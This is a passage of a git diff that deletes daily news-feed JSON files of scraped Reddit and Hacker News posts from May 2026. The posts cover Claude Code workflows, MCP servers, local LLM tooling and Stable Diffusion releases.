workflow can define things like: \\- agents \\- models/providers \\- tools \\- schemas \\- inputs \\- ordered execution steps \\- validation rules \\- output artefacts The goal is not to build a magical autonomous agent framework. The goal is more boring. make LLM workflows easier to read, version, review, validate, and run repeatedly. A rough example of the kind of thing I’m aiming for: `agent researcher:` `provider: ollama` `mod…", - "category": "ai_models" - }, - { - "title": "My pre-coding routine with Claude Code, 5 MCP servers before I write a single line", - "url": "https://reddit.com/r/ClaudeAI/comments/1ta3a9x/my_precoding_routine_with_claude_code_5_mcp/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-11T13:26:49.000Z", - "summary": "Been running this routine for months now. Started because I was losing too much time to Claude just guessing. Halluzinated class names, outdated SDK methods, advice that didn't match the codebase I was actually in. So I built a routine I run before I let it write anything. Takes maybe 60-90 seconds. Saved me hundreds of hours by now. 1. Start the session and load memory. A memory MCP carries context across sessions. Last sprint, open decisions, recent learnings, why we picked X over Y three months ago. Without this, every session starts cold and Claude rebuilds my reasoning from scratch, usually wrong. 2. Index the codebase as a graph. A codebase-memory server builds a knowledge graph of the repo. Functions, callers, dependencies, cycles. When Claude needs to know what calls processOrder, it queries the graph instead of grepping blind. One tool call replaces dozens of file reads. 3. Search with Tavily for current practice. Before any non-trivial decision I let it search what people are actually doing right now. Training data is old. Best practices from a year ago aren't always still best practices. Clean answer with sources, not a wall of SEO spam. 4. Load Context7 for library doc…", - "category": "ai_tools" - }, - { - "title": "Dunetrace: Real-time monitoring of your production agents", - "url": "https://reddit.com/r/StableDiffusion/comments/1t9wib2/dunetrace_realtime_monitoring_of_your_production/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "open_source", - "tool_update" - ], - "matching_tags": [ - "api_update", - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-11T07:52:28.000Z", - "summary": "I have been building Dunetrace, a open-source real-time monitoring tool for your production agents. **Problem:** When agent run, they return a confident answer. But sometimes in reality the answer is wrong and consumed lot of tokens due to tool loop or some other silent failures. All the existing tools are good once something is broke and you can debug. I wanted something that alerts before the user notices. The latest update adds: **Cross-agent pattern analysis.** Dunetrace now shows you which detectors are firing across your entire agent fleet, not just per-run alerts. TOOL\\_LOOP fired on 18% of your example-agent runs this week and it's trending up? That's a code bug, not a transient failure. Agent health score 0–100 per agent\\_id. **Langfuse deep analysis.** Connect your Langfuse API key and you get an 'Explain with Langfuse' button on every signal. Dunetrace fetches the trace, reads the actual system prompt, and tells you exactly whats missing. You get the root-cause from real evidence. **Custom typescript, python agent integration**. A few of you were building custom agents outside LangChain. There's now a zero-dependency integration. **GitHub repo:** [https://github.com/dun…", - "category": "creative_tools" - }, - { - "title": "I catalogued every way local models break JSON output and built a repair library, here's what I found across 288 model calls", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tagtpv/i_catalogued_every_way_local_models_break_json/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-11T21:17:18.000Z", - "summary": "I've been running structured output prompts through a bunch of models on OpenRouter for the past few months — Llama 3, Mistral, Command R, DeepSeek, Qwen, and every other model on OpenRouter — alongside the usual closed-source suspects. 288 calls total. I wanted to know what actually breaks, how often, and whether open models fail differently from the API-only ones. Short answer: not really. The failure modes are almost identical across the board. The *rate* varies — some models hit you with markdown fences on nearly every call, others only when you phrase the prompt a certain way; but the categories of breakage are the same everywhere. What I saw most, roughly in order: 1. Markdown fences wrapping the JSON (the model thinks it's being helpful) 2. Trailing commas (JS habits from training data) 3. Python `True`/`False`/`None` instead of JSON `true`/`false`/`null` 4. Truncated objects from running out of tokens mid-response 5. Unescaped quotes inside string values 6. `//` or `#` comments inside JSON 7. Literal `...` where the model got lazy and didn't generate all the data The reason I'm posting here specifically: most of the advice I see for handling this is \"just use JSON mode\" or…", - "category": "ai_models" - }, - { - "title": "What improved my Claude Code workflow: stop treating it like chat, start treating it like a dev with a workstation", - "url": "https://reddit.com/r/ClaudeAI/comments/1taelgl/what_improved_my_claude_code_workflow_stop/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-11T19:59:39.000Z", - "summary": "The most useful improvement I’ve found for Claude Code-style work has not been a magic prompt. It has been changing the shape of the task. When I give an agent a vague request, I get vague work. When I give it a real workstation + a real ticket, the results get much more predictable. The workflow that has been working for me: **1. Start with a ticket, not a prompt** A good ticket has: * goal * exact repo/path/context * acceptance criteria * test command * files or areas that are off-limits * expected output * whether the agent is allowed to make changes or only investigate Example: “Find why the billing page shows an empty state for active subscriptions. Do not change pricing or Stripe webhook logic. Add a regression test if possible. Run npm test. Summarize the root cause and changed files.” That tends to work much better than: “Fix the billing page.” **2. Give the agent a persistent environment** A lot of coding-agent work is not pure reasoning. It is environment work: * clone repo * install dependencies * inspect file structure * run tests * inspect logs * patch * rerun * generate output When the environment disappears after the conversation, the agent loses useful state. A per…", - "category": "ai_tools" - }, - { - "title": "The Claude Platform on AWS is now generally available.", - "url": "https://reddit.com/r/ClaudeAI/comments/1ta7p4n/the_claude_platform_on_aws_is_now_generally/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-11T16:03:57.000Z", - "summary": "AWS customers get the full set of Claude API features, with AWS authentication, billing, and commitment retirement. Build and deploy agents at scale with Claude Managed Agents, or use features like the advisor strategy, code execution, web search, web fetch, the Files API, MCP connector, prompt caching, citations, and batch processing. Anthropic operates the service, and all new features ship the same day they go live on the native Claude API. Claude also remains available on Amazon Bedrock, where AWS is the data processor. This is a good fit for teams with strict regional data residency requirements or that need data processed exclusively within AWS infrastructure. Read more: [https://claude.com/blog/claude-platform-on-aws](https://claude.com/blog/claude-platform-on-aws)", - "category": "ai_tools" - }, - { - "title": "Claude Code Orchestrator -> Sub-agent local LLM", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t9xyku/claude_code_orchestrator_subagent_local_llm/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-11T09:17:33.000Z", - "summary": "Not written by an AI, so bear with me :P Has anyone else tried to use their local LLM in conjunction with Claude Code? I looked into [Pi.dev](http://Pi.dev) a bit, and from their documentation, I read about their RPC Mode which allows me to send command line commands to it. So I'm thinking of making a MCP Claude Code can utilize to use [Pi.Dev](http://Pi.Dev) as a sub-agent and save a bit of usage. My line of thinking is: Claude Code orchestrator -> Local LLM -> Claude Code reviewing the code in the PR. Anyone tries this? Am I missing something or am I a monday morning genious?", - "category": "ai_models" - }, - { - "title": "Anyone else think the 1T Valuation is dangerous for Anthropic?", - "url": "https://reddit.com/r/ClaudeAI/comments/1t9vuw5/anyone_else_think_the_1t_valuation_is_dangerous/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 1, - "date": "2026-05-11T07:14:55.000Z", - "summary": "TLDR: The market's 1T valuation is pricing for perfection. I think there are 4 ways this perfection doesn't happen. I love Claude and Claude Code, I use it every day, and their revenue numbers (30B ARR) are amazing, and if I had a chance to invest in Anthropic a month ago, I would. But... now it is reaching **1 Trillion** valuation on secondary market. It took Apple 40 years to reach, 5 years for Anthropic. A valuation so high means it has limited growth. It's clearly driven by FOMO. If it has a down round, it would be a disaster. I see a few vulnerabilities that can cause Anthropic to go down. 1. **Models are improving but others are catching up** Opus 4.7 wasn't a big upgrade, and \"Mythos\" still isn't public. Competitors are closing fast, and switching is one click away. If a new model launched tomorrow at 80% of Claude's quality and 3% the cost, I'd hesitate. But at 95% quality and 50% cost? I'd switch the same day. And so would everyone else paying enterprise rates. 2. **Limited revenue sources** Of that $30B ARR, the open guess is 60%+ comes from Claude Code and developer API. That's a single customer segment, and it's the exact segment OpenAI, Google, and every well-funded s…", - "category": "ai_tools" - }, - { - "title": "Markdown browser for LLMs", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t9tsro/markdown_browser_for_llms/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-11T05:23:15.000Z", - "summary": "I built a markdown web renderer for AI agents. Instead of taking expensive screenshots and piping them through vision models, TextWeb renders web pages as markdown that LLMs can reason about natively. Full JavaScript execution, interactive elements annotated. It provides a CLI and an MCP server. You can find it here: [https://github.com/woheller69/textweb](https://github.com/woheller69/textweb) The LLM can do things like: navigate a web page, scroll up/down, enter text into input fields, click buttons, etc. Works with llama.cpp web UI. It is based on [https://github.com/chrisrobison/textweb](https://github.com/chrisrobison/textweb) which has a text grid renderer instead of markdown.", - "category": "ai_models" - }, - { - "title": "I upgraded my Agent OS to a local 35B model and its code failure rate dropped to 0%", - "url": "https://reddit.com/r/ClaudeAI/comments/1t9tqz6/i_upgraded_my_agent_os_to_a_local_35b_model_and/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-11T05:20:39.000Z", - "summary": "I’ve been obsessed with autonomous agents lately, but it got tiring when they keep hitting walls because they didn't have the right \"tools\" or because their context window turned to mush after an hour. I’ve found that local multi-agent systems where agents are driven by an aversive state (a suffering system) to autonomously write, sandbox, and hot-load their own tools so they don't hit walls has worked quite well. When an agent encounters something it hasn’t seen before, it builds a new tool for the job, tests it in a sandbox, registers it, lets the other agents know, then keeps rolling. It’s able to build an infinite library of anything it may need in the future, completely autonomously without a human ever in the loop. Repo: [https://github.com/ninjahawk/hollow-agentOS](https://github.com/ninjahawk/hollow-agentOS) *Isn’t letting local LLMs write their own code at runtime going to get too chaotic and brick the OS fast?* With a small model (like the 9B fallback), possibly. Under high system stress, a 9B model panics. It rushes, hallucinates invalid function calls, and tries to force broken syntax past the gates. But I just scaled the default runtime engine to **Qwen 3.6 35B A3B**…", - "category": "ai_tools" - }, - { - "title": "Natural Woman V2 - Z Image Turbo Lora", - "url": "https://reddit.com/r/StableDiffusion/comments/1t9oono/natural_woman_v2_z_image_turbo_lora/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 1, - "date": "2026-05-11T01:14:23.000Z", - "summary": "Hey all, I finally got around to training a new version to my natural woman lora. The point being to fix the actor face that ZIT can tend to produce. The first version was ok but there were many cases where the image produced was lack luster or downright bad. This version accomplishes the goal while not corrupting the model. Download it here: [https://civitai.com/models/2207094?modelVersionId=2935386](https://civitai.com/models/2207094?modelVersionId=2935386) Only thing is, models tend to look back over shoulder even when prompted to face forward. I'm pruning the dataset to train a 2.1 version to fix this so look out for that. Also, while I've found that the actor face does not affect men as much as woman, I am training a natural-men lora as well. Look out for that soon.", - "category": "creative_tools" - }, - { - "title": "I have to pretend I hate image generation AI to avoid getting banned or insulted on 99% of Reddit or the internet, even though Stable Diffusion is actually what I like and am most excited about right now. Why do people hate AI so much, esp…", - "url": "https://reddit.com/r/StableDiffusion/comments/1tahphc/i_have_to_pretend_i_hate_image_generation_ai_to/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-11T21:50:34.000Z", - "summary": "I'm not even saying I care if they know the difference between open-source and closed-source image-generating AI, or if they insult me ​​or not. What I want to know is why so many people hate AI, especially image-generating AI. At first, I thought it only bothered artists, because they're afraid their artwork will be stolen or something. Then I thought it might also bother those who are afraid of not being able to distinguish AI from reality. But it's practically 99% of people who hate AI, and I just can't understand why.", - "category": "creative_tools" - }, - { - "title": "Sibling to Anthropic's Claude FM — where Claude FM curates, WRIT-FM operates", - "url": "https://reddit.com/r/ClaudeAI/comments/1tagr4x/sibling_to_anthropics_claude_fm_where_claude_fm/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-05-11T21:14:52.000Z", - "summary": "Anthropic shipped `/radio` this week - Claude Code now has a lofi button that opens Claude FM, a stream curated by human musicians. I'll use it. I built WRIT-FM - a 24/7 AI radio station where every layer is model output, not a hand-picked playlist: * **Music**: AI-generated. No catalog, no human picks. Tracks produced per show by ACE-Step via a local music-gen server. * **Talk**: Claude CLI writes the hosted breaks - deep dives, news analysis, panel debates, listener mailbags, music essays. Kokoro TTS speaks them in 5 distinct voices. * **Hosts**: The Liminal Operator (philosophy), Dr. Resonance (music archaeology), Nyx (night/dreams), Signal (news analysis), Ember (soul/groove). They rotate across 8 shows. Sundays at 18:00 a Listener Hours mailbag replaces the regular slot. * **Broadcast**: ezstream → Icecast → Cloudflare tunnel → optional YouTube RTMP relay. * **Operator**: a Claude Code agent on a 15-minute loop. Health-checks the encoder, stocks music and talk segments for upcoming slots, turns listener messages into on-air responses, grows per-station topic banks when scheduled focus areas thin out, and writes *intent cards* that steer specific upcoming segments. The piece I…", - "category": "ai_tools" - }, - { - "title": "prompt caching, but for rl training - 7.5x speedup on long-prompt/short-response workloads", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tage06/prompt_caching_but_for_rl_training_75x_speedup_on/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-11T21:01:45.000Z", - "summary": "most open source RL engines pack sequences naively: prompt + response, repeated for every sample in the group. this is fine for short prompt, long completion workloads but inefficient for long prompt, short completion workloads. with 1000-token prompts and 100-token responses at G=8, you're processing 8800 tokens when only 1800 are unique. about 5x wasted compute. the fix is conceptually simple: compute the prompt once, then compute all G responses after it. it's analagous to inference prefix caching, except training needs gradients to flow back through the prompt, which breaks causal attention in the obvious implementation. getting it right required different tricks for full vs. linear attention layers. you can read about it in the blogpost in the comments. Numbers on Qwen3.5-4B: \\- 16k prompt / 64 out → 7.5x \\- 16k / 128 → 7.3x \\- 16k / 1k → 5.4x \\- 8k / 4k → 1.7x", - "category": "ai_models" - }, - { - "title": "GitLab announces workforce reduction and end of their CREDIT values", - "url": "https://about.gitlab.com/blog/gitlab-act-2/", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-11T20:51:57.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-12.json b/data/news-feed-2026-05-12.json deleted file mode 100644 index 6fbf421..0000000 --- a/data/news-feed-2026-05-12.json +++ /dev/null @@ -1,259 +0,0 @@ -{ - "generated": "2026-06-05T00:44:39.379Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-12", - "article_count": 15, - "archived_story_count": 612, - "articles": [ - { - "title": "TUI to actually see what Claude Code is doing: cost, loops, tool commands…", - "url": "https://reddit.com/r/ClaudeAI/comments/1tb669z/tui_to_actually_see_what_claude_code_is_doing/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-12T16:08:47.000Z", - "summary": "I was running blind watching Claude Code work, could not tell where my money was going, when it was stuck in a loop, or what it was doing with my filesystem. So i built something open source to make it visible. works with Claude Code, Codex CLI, Gemini CLI, Cursor, and any MCP server. A scan of my own machine for the last 90 days showed what i do been missing: \\- $14K spend across 39 sessions \\- 129 agent loops, \\~20% wasted iterations (mostly Edit-in-circles on the same 5 files) \\- 3 credential leaks in tool input (JWTs, GitHub tokens, GCP keys) \\- 5 sensitive paths an AI could reach at any moment (\\~/.ssh, \\~/.npmrc, gcloud creds) \\- 2 dangerous commands node9 would have blocked Now i can: \\- See where my money is going in real time \\- Catch the most dangerous commands before they finish running \\- Stop or continue a run while it's happening \\- Analyze the data after the fact, any time range The live dashboard: \\- High level: cost, tokens, command counts, all live \\- Notifications: loops + critical commands surface here so i can make a call before things go sideways \\- Live feed: the commands Claude is running right now \\- Live security: dangerous actions the AI is taking \\- Liv…", - "category": "ai_tools" - }, - { - "title": "I built a Mac app that turns Claude Code agents into live radio stations | Free & open source", - "url": "https://reddit.com/r/ClaudeAI/comments/1tasoqo/i_built_a_mac_app_that_turns_claude_code_agents/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-12T06:01:21.000Z", - "summary": "**TL;DR:** Agent FM is an open-source Mac app that lets you tune in to your Claude Code and Codex agents while they work, so you can stay in the loop and hear their progress live. Each agent gets its own live radio station. You can tune in to one agent, or listen to a Global Mix across all active agents. It surfaces progress, blockers, decisions, errors, and attention requests in real time. GitHub: [https://github.com/agentfm-ai/agent-fm](https://github.com/agentfm-ai/agent-fm) Hey everyone! How do you stay in the loop when multiple AI coding agents are running at the same time? That was the problem I kept running into. At some point, it became normal to have several Claude Code and Codex sessions running at once across different repos. Sometimes 8-10. The agents move quickly, but staying on top of them still means reading terminal transcripts across a bunch of windows. That workflow was broken in a very specific way: * I would miss which agent was blocked. * I would miss which one needed approval. * I would lose track of which files changed. * I would have to context-switch between terminals just to answer \"what is this agent doing right now?\" * The agents could run in parallel,…", - "category": "ai_tools" - }, - { - "title": "Steam Recommender using similarity! (Undergraduate Student Project) [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tb8k3n/steam_recommender_using_similarity_undergraduate/", - "source": "Reddit r/MachineLearning", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 1, - "date": "2026-05-12T17:30:32.000Z", - "summary": "(DISCLAIMER: I accidentally deleted the last post on this subreddit my apologies if this is your second time seeing it) Last year I made a [post](https://www.reddit.com/r/datascience/comments/1lkjxmr/steam_recommender_using_vectors_student_project/) about my steam recommender The last one was great and served its purpose of showing many people new games, But this new version is much more functional! I love making recommendation systems that tell the user WHY they got the recommendation. During a steam sale event, I always find myself trying to look for new video games to play. If I wanted to find a new game I would try to whittle it down by using steam tags, but the steam tag system is very broad \"action\". could apply to many many games. That got me thinking, what aspects do I like about my favorite games? Well I like Persona 4 because of the city vibes and jazz fusion, Spore because of the unique character creation and whimsical theme. Balatro for its unique deck building synergies. What if I could capture unique tags that identify a game that aren't just \"action\" and put them into vectors to show the (focus) of a game For example I could break persona 4 into something like Game…", - "category": "ai_research" - }, - { - "title": "Elgato Stream Deck Usage Plugin", - "url": "https://reddit.com/r/ClaudeAI/comments/1tb6exu/elgato_stream_deck_usage_plugin/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-12T16:16:59.000Z", - "summary": "Wanted an easier way of keeping an eye on my usage, so created this plugin for the Elgato Stream Deck. Five keys, exact percentages from your account: current 5-hour session, weekly all-models, weekly Sonnet, weekly Claude Design, monthly extra credits. Each shows a reset countdown. Tap any key to open the Settings page directly. It calls Anthropic's own usage endpoint with the OAuth token Claude Code already stores locally — same data the Settings page shows, no separate API key, nothing leaves your machine. Windows + Mac, classic Stream Decks (MK.2 / XL / Mini / Neo). One-click installer + source: [https://github.com/Darhkfox/streamdeckclaude](https://github.com/Darhkfox/streamdeckclaude) *Caveat: the endpoint is undocumented so Anthropic could break it. Works fine today.* Enjoy! (also the first time i've used github so hope all works fine!)", - "category": "ai_tools" - }, - { - "title": "Can we acknowledge that Anthropic watches open sourcers and copies them?", - "url": "https://reddit.com/r/ClaudeAI/comments/1tayk1l/can_we_acknowledge_that_anthropic_watches_open/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-05-12T11:19:48.000Z", - "summary": "I’ve been seeing over the past few months an interesting phenomenon, an open sourcer makes a tool or MCP < Anthropic adds functionality for that exact thing a couple weeks later < repeat. The biggest examples are Openclaw (like 5 features, including cowork), persistent memory across chats, and latest example of the “goal” feature being added. This is obvious and I’m not really saying anything that’s revolutionary here, I’m sure we’ve all noticed it. My larger observation, no credit is given, they’re just copying and then providing a direct replacement for things open sourcers thought of. At this level, we’re all learning from each other. AI like it is right now is very new and you could even argue that they’re not copying, that we’re all just thinking the same things. The deeper issue though is that this shows a dystopian effect of AI, the big companies get the credit widely for things others have done. More people have heard about Claude cowork than have heard about Openclaw, and the result of the guy who made it was getting a job at OpenAI. He wasn’t able to make this into a business, it’s not how open source has been for the past 20 years where an idea can be copied but n…", - "category": "ai_tools" - }, - { - "title": "Cache-testing software for LLM-provider-style tiered ephemeral caches? [D]", - "url": "https://reddit.com/r/MachineLearning/comments/1tayaiw/cachetesting_software_for_llmproviderstyle_tiered/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-12T11:07:23.000Z", - "summary": "I'm looking for a cache simulator / benchmark suite suited to the kind of tiered ephemeral cache that LLM providers use — e.g. Anthropic's 4-tier prompt cache, where context sits across several tiers with different residency windows, costs, and eviction rules. I've already tried **libCacheSim**. It's a solid piece of software for classical caches (LRU, FIFO, ARC, SIEVE, S3-FIFO, W-TinyLFU, Belady oracle, plugin API, trace replay), and I got a plugin + synthetic trace working against it. But it seems fundamentally aimed at single, flat caches: * One cache, not a hierarchy of tiers with different costs * No notion of partial / multi-tier residency of the same object * Misses are uniform-cost — no way to express \"miss to L1 vs miss to L3 vs full recompute,\" which is the whole point in LLM prompt caching * Trace model is atomic get/put, not edit streams where cached objects mutate in place * No first-class support for token-weighted object sizes So it works as a baseline comparator, but it's not really the right shape for evaluating LLM-cache policies. **Does anyone know of cache-testing software specifically targeting LLM-provider-style caches?** Something that models multiple tiers…", - "category": "ai_research" - }, - { - "title": "Claude MCP integration made my old meeting notes actually useful again", - "url": "https://reddit.com/r/ClaudeAI/comments/1tb2ns8/claude_mcp_integration_made_my_old_meeting_notes/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "tool_update" - ], - "matching_tags": [ - "mcp", - "tool_update" - ], - "importance": 0.99, - "date": "2026-05-12T14:05:14.000Z", - "summary": "I’ve been testing the new Claude MCP integration with Bluedot and it changed how I use meeting notes completely. Before this, most meeting transcripts just sat there after the call. Now I can chat with all my past meetings directly inside Claude, pull context from old discussions, search decisions, action items, summaries, recordings, and combine that with info from other tools too. What I like about Bluedot is that it stays out of the meeting itself, no bot joining the call, but still captures everything cleanly in the background. The searchable meeting history is honestly the biggest feature for me now. Anyone else experimenting with Claude MCP workflows yet?", - "category": "ai_tools" - }, - { - "title": "Converted Karpathy's coding skill from Pro to free plan. Here's the full thing:", - "url": "https://reddit.com/r/ClaudeAI/comments/1tavcuo/converted_karpathys_coding_skill_from_pro_to_free/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.99, - "date": "2026-05-12T08:29:36.000Z", - "summary": "The Karpathy coding skill is locked behind Pro. It doesn't use any Pro-only features, so I rewrote it for free plan chat workflows. Same philosophy, tuned for no terminal, no subagents, and a shorter context window where mistakes are expensive. Paste the whole thing into a Project's custom instructions or use it as a system prompt. It auto-triggers on any coding request. --- name: karpathy-coding description: Apply Karpathy-inspired coding discipline to any programming task. Use this skill whenever the user asks you to write, fix, refactor, extend, or review code — even casually (\"can you add X\", \"why is this breaking\", \"clean this up\"). Also trigger when the user pastes code and asks a question about it, when they describe a feature or bug, or when they use words like \"implement\", \"build\", \"add\", \"fix\", \"change\", or \"improve\" in a technical context. This skill is especially valuable on the free plan where mistakes are costly because regenerating and iterating burns the context window fast. compatibility: claude-code opencode --- # Karpathy Coding Guidelines Derived from Andrej Karpathy's observations on LLM coding pitfalls, adapted for chat-first workflows (no terminal, no subage…", - "category": "ai_tools" - }, - { - "title": "What MCP servers are you guys using for persistent memory?", - "url": "https://reddit.com/r/ClaudeAI/comments/1taq1ub/what_mcp_servers_are_you_guys_using_for/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "tool_update" - ], - "matching_tags": [ - "mcp", - "tool_update" - ], - "importance": 0.96, - "date": "2026-05-12T03:49:32.000Z", - "summary": "Getting really tired of pasting the same project docs into claude every morning. I started testing the recall MCP integration to pipe my saved pdfs and web clips directly into my editor so claude actually has long-term context on what i'm building. It works pretty well, but i'm wondering what other tools you guys are using for MCP memory right now? Just trying to see what the standard stack is for keeping claude grounded.", - "category": "ai_tools" - }, - { - "title": "I realized character consistency breaks after the first few images", - "url": "https://reddit.com/r/StableDiffusion/comments/1tb281q/i_realized_character_consistency_breaks_after_the/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 0.9, - "date": "2026-05-12T13:49:35.000Z", - "summary": "I was trying to make the same character show up across a few different scenes last week, and the first image looked fine. Then I tried changing the setting, the lighting, the pose, and the mood a little. Not even anything extreme. Just enough to make the character feel like they were doing something else. That was where everything started to drift. The face was almost right, but not really. The outfit changed in tiny ways. One reference worked better than another, but I forgot which one I used. A prompt line from yesterday gave better results, but it was buried in a different chat. I had drafts in one folder, references in another, and “final” images that were not really final. At some point I realized the problem was project memory. For one image, a good prompt or LoRA can be enough. For a repeatable character series, I need a way to keep the character, references, prompts, sessions, and generated artifacts together, so I can come back tomorrow and still know what happened. That is what we have been testing with OpenMelon. It is an open-source content-creation agent that runs in the terminal. It is not an image model and it is not trying to replace SD, ComfyUI, LoRAs, or whatever…", - "category": "creative_tools" - }, - { - "title": "My First Official AI Research Paper Accepted on SSRN", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tbht4h/my_first_official_ai_research_paper_accepted_on/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-12T23:04:46.000Z", - "summary": "https://preview.redd.it/oz4vpoxdfs0h1.jpg?width=910&format=pjpg&auto=webp&s=fa4c91aad0e3c56850fbfc06099e9c4095712bbd Today, my research paper **“Stable Training with Adaptive Momentum (STAM)”** was officially accepted on **SSRN** — marking my first documented and official publication as an AI Researcher. The paper introduces a new optimization algorithm for deep learning training that outperformed several popular optimizers in selected benchmarks, addressed multiple training stability challenges, and achieved up to **50% reduction in computational training cost** in some experiments. This is an important milestone in my research journey, and I’m excited to continue exploring optimization techniques for efficient and stable AI training. You can read the paper here: [https://papers.ssrn.com/sol3/papers.cfm?abstract\\_id=6699059](https://papers.ssrn.com/sol3/papers.cfm?abstract_id=6699059)", - "category": "ai_models" - }, - { - "title": "What solutions are you using to boost TPS and Context Window?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tbe3yz/what_solutions_are_you_using_to_boost_tps_and/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-12T20:42:32.000Z", - "summary": "**Server Specs:** 16 Gigs DDR5 AMD Ryzen 5 7600X 4.7 GHz 6-Core Processor AMD Radeon Sapphire Nitro+ 7900XTX NZXT N7 B650E ATX AM5 Motherboard **Performance:** I'm running Qwen27b Q4 at 80k context on a Sapphire Nitro+ Radeon 7900XTX 24Gb at 40 t/s. My setup is Llama.cpp + Vulcan. **Question:** I've been having a blast with it, but it's time for some extra power under the hood. The return rate is just slow enough to be annoying with tooling, and the context window is just short enough to not handle low-end big tasks. In a perfect world I'm running 120-140 Context at 60t/s. Hardware upgrades aside, what are some software changes that you guys have found that work?", - "category": "ai_models" - }, - { - "title": "How many years do you think we are from making feature films at home?", - "url": "https://reddit.com/r/StableDiffusion/comments/1tbdxnw/how_many_years_do_you_think_we_are_from_making/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-12T20:36:10.000Z", - "summary": "What would be your LLM(AI) Stack? Also Tools/Github repos? How long would it take to complete a feature film(60-90 mins) approximately? * Image Models : ??? * Audio Models : ??? * Video Models : ??? * LoRA/Finetunes/Workflows/etc., : ??? * Tools/Github Repos : ??? * Misc : ??? For Non-AI, we have so much FREE / Open source Tools. Sharing the stack I collected for my future short filmmaking. * (Raster) Image : GIMP, paint.NET, Pinta * (Vector) Image : Inkscape, Karbon, LibreOffice Draw * Painting : Krita * Animation : Blender, Krita, Synfig, Pencil2D, TupiTube, Pivot Animator * Audio Editing : Audacity, Ardour * Video Editing : OpenShot, Shotcut, Kdenlive, Davinci Resolve * Video : HandBrake * Digital compositing : OpenShot, Shotcut, Blender, Natron * Writing : FocusWriter, Manuskript, yWriter * Screenwriting : Trelby, Celtx Randomly found [this (2+ years) old thread](https://www.reddit.com/r/StableDiffusion/comments/18kfoln/how_many_years_do_you_think_we_are_from_making/) (Nice thread & comments) which forced me to post this thread Even without AI, some filmmakers already made films alone(except few stuffs like Voice-overs or editing), talking about animation films here. Shari…", - "category": "creative_tools" - }, - { - "title": "Chroma1-HD Character Transfer with Flux.2 Dev", - "url": 